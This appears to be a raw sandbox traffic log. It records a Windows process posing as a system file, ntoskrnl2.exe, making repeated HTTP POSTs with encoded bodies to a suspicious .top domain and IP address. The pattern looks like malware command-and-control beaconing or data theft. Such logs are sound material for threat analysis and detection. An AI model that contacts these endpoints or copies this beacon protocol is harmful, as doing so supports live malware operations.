                                                            Sep 2, 2024 13:34:48.505717993 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:48.853290081 CEST1028OUTData Raw: 55 50 5a 51 5b 41 59 53 5b 5f 56 5a 57 5c 50 52 55 5d 5e 49 50 5b 5a 5d 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UPZQ[AYS[_VZW\PRU]^IP[Z]YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$'!\?+''1)X'.2\?88$=T+/)7#?2>-%^./]+,
                                                            Sep 2, 2024 13:34:49.180048943 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:49.305191994 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:48 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ
                                                            Sep 2, 2024 13:34:49.647269964 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:48 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            73192.168.2.64982080.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:49.649369001 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:49.993706942 CEST1028OUTData Raw: 50 53 5f 55 5e 49 5c 51 5b 5f 56 5a 57 5c 50 59 55 50 5e 47 50 52 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PS_U^I\Q[_VZW\PYUP^GPRZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'[3""??\%2'9+8;'/>??*B8Z>W*_9:%^./]+,
                                                            Sep 2, 2024 13:34:50.305536985 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:50.434478045 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:49 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            74192.168.2.64982180.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:50.583271027 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:50.937712908 CEST1028OUTData Raw: 50 52 5a 5f 5e 41 59 5d 5b 5f 56 5a 57 54 50 5e 55 50 5e 41 50 53 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PRZ_^AY][_VZWTP^UP^APSZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$3(+8$![0.)+-?,$3'Z9V+(0)$^>&_9%^./]+
                                                            Sep 2, 2024 13:34:51.256860018 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:51.381167889 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:50 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            75192.168.2.64982280.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:52.240063906 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1024
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:52.587743044 CEST1024OUTData Raw: 55 50 5a 5f 5e 48 5c 50 5b 5f 56 5a 57 5d 50 5c 55 50 5e 41 50 53 5a 50 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UPZ_^H\P[_VZW]P\UP^APSZPYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$0?8^3_$.*X+=#8$Z&<W?0P>+=".:%^./]+0
                                                            Sep 2, 2024 13:34:52.896509886 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:53.034858942 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:52 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            76192.168.2.64982380.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:53.170660973 CEST346OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Sep 2, 2024 13:34:53.525063992 CEST1028OUTData Raw: 50 53 5a 54 5e 43 5c 50 5b 5f 56 5a 57 5f 50 5e 55 5d 5e 49 50 5e 5a 59 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PSZT^C\P[_VZW_P^U]^IP^ZYYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$0W.<;$$T)$=:]>>8-433%<W=)>]-*%^./]+


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            77192.168.2.64982480.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:53.610939980 CEST346OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Sep 2, 2024 13:34:54.121349096 CEST1340OUTData Raw: 55 55 5a 56 5e 45 5c 57 5b 5f 56 5a 57 5b 50 5e 55 5d 5e 42 50 5a 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UUZV^E\W[_VZW[P^U]^BPZZ_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\''"!Y=;7\3&$.:X([$/0Z5*((U)$?*2"Y-*%^./]+0
                                                            Sep 2, 2024 13:34:54.257817984 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:54.478786945 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:54.485785961 CEST308INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:53 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 20 1e 23 37 33 56 31 38 2c 13 3e 29 22 59 29 3d 0e 40 39 06 24 5a 30 2a 23 59 28 54 21 1b 25 2a 21 5c 29 3c 21 5c 28 32 31 52 21 34 20 5b 03 1f 25 18 37 22 36 57 24 38 2d 1f 27 09 03 05 35 37 3b 05 29 04 25 0e 33 03 24 5d 23 21 22 54 3b 04 3e 57 26 28 2b 02 3a 2f 32 15 25 2e 2a 56 08 16 38 56 2b 3c 39 01 22 37 0d 1f 21 38 00 0d 20 18 3b 53 27 30 3f 54 30 2a 0f 56 24 58 38 0e 3e 13 2b 5f 27 17 3a 04 23 0d 2d 50 2d 39 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: #73V18,>)"Y)=@9$Z0*#Y(T!%*!\)<!\(21R!4 [%7"6W$8-'57;)%3$]#!"T;>W&(+:/2%.*V8V+<9"7!8 ;S'0?T0*V$X8>+_':#-P-9$P.-V0WS


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            78192.168.2.64982580.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:53.762196064 CEST346OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Sep 2, 2024 13:34:54.198261023 CEST1028OUTData Raw: 55 5e 5a 5f 5e 47 5c 50 5b 5f 56 5a 57 5b 50 53 55 5b 5e 42 50 5e 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U^Z_^G\P[_VZW[PSU[^BP^ZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$$1+8#$%_0>+.(],48X'<-R<U=7#>Y::%^./]+0
                                                            Sep 2, 2024 13:34:54.437721968 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:54.643871069 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:53 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            79192.168.2.64982680.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:54.909677029 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:55.259227037 CEST1028OUTData Raw: 50 56 5a 5f 5e 45 59 55 5b 5f 56 5a 57 55 50 5a 55 58 5e 46 50 5a 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PVZ_^EYU[_VZWUPZUX^FPZZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$32%](+$$2=Y$^?> ]/$]0Z*?(<Q>4>:X::%^./]+
                                                            Sep 2, 2024 13:34:55.562895060 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:55.704981089 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:54 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            80192.168.2.64982780.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:55.855164051 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:56.212521076 CEST1028OUTData Raw: 55 5e 5a 51 5e 45 59 50 5b 5f 56 5a 57 55 50 5e 55 59 5e 48 50 5e 5a 5e 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U^ZQ^EYP[_VZWUP^UY^HP^Z^YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$3!+^'235<'87;3=R('*Y).^9%^./]+
                                                            Sep 2, 2024 13:34:56.519773960 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:56.648953915 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:55 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            81192.168.2.64982880.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:56.786775112 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:57.137279034 CEST1028OUTData Raw: 55 5f 5a 50 5e 48 59 5c 5b 5f 56 5a 57 5c 50 5e 55 58 5e 40 50 5c 5a 5e 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U_ZP^HY\[_VZW\P^UX^@P\Z^YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\''!.=($"5_'X&?.(Z8' $R((='8[)W>.%^./]+,
                                                            Sep 2, 2024 13:34:57.438268900 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:57.557244062 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:56 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            82192.168.2.64982980.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:57.687086105 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:58.040652990 CEST1028OUTData Raw: 55 51 5f 51 5e 41 5c 51 5b 5f 56 5a 57 5b 50 5e 55 5a 5e 41 50 5b 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UQ_Q^A\Q[_VZW[P^UZ^AP[Z_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$3"-(?$50.&(>';$$0Z"*8*B<>>9:%^./]+0
                                                            Sep 2, 2024 13:34:58.344638109 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:58.558609009 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:57 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            83192.168.2.64983080.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:58.695794106 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:59.096906900 CEST1028OUTData Raw: 55 54 5a 5f 5e 47 5c 50 5b 5f 56 5a 57 5a 50 5d 55 5d 5e 47 50 58 5a 5d 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UTZ_^G\P[_VZWZP]U]^GPXZ]YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Z$1?+43!_'.:^?-$0<)?(=$_>W%/:%^./]+
                                                            Sep 2, 2024 13:34:59.377006054 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:59.507061005 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:58 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ
                                                            Sep 2, 2024 13:34:59.732682943 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            84192.168.2.64983180.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:59.840683937 CEST346OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1024
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Sep 2, 2024 13:35:00.196726084 CEST1024OUTData Raw: 55 5f 5f 55 5b 46 59 53 5b 5f 56 5a 57 5d 50 5f 55 59 5e 49 50 5e 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U__U[FYS[_VZW]P_UY^IP^ZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'$2=+;4%23?-$8Z'Z9V+;;*^*:Y-:%^./]+<
                                                            Sep 2, 2024 13:35:00.487973928 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:00.614816904 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:59 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            85192.168.2.64983280.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:00.755006075 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:01.103287935 CEST1028OUTData Raw: 50 53 5a 57 5e 45 59 54 5b 5f 56 5a 57 58 50 5e 55 50 5e 47 50 53 5a 5d 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PSZW^EYT[_VZWXP^UP^GPSZ]YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$3!&?_$T:0--($;B<$)W+(8U(74)"-%^./]+<
                                                            Sep 2, 2024 13:35:01.401489019 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:01.684755087 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:00 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ
                                                            Sep 2, 2024 13:35:01.684947014 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:00 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
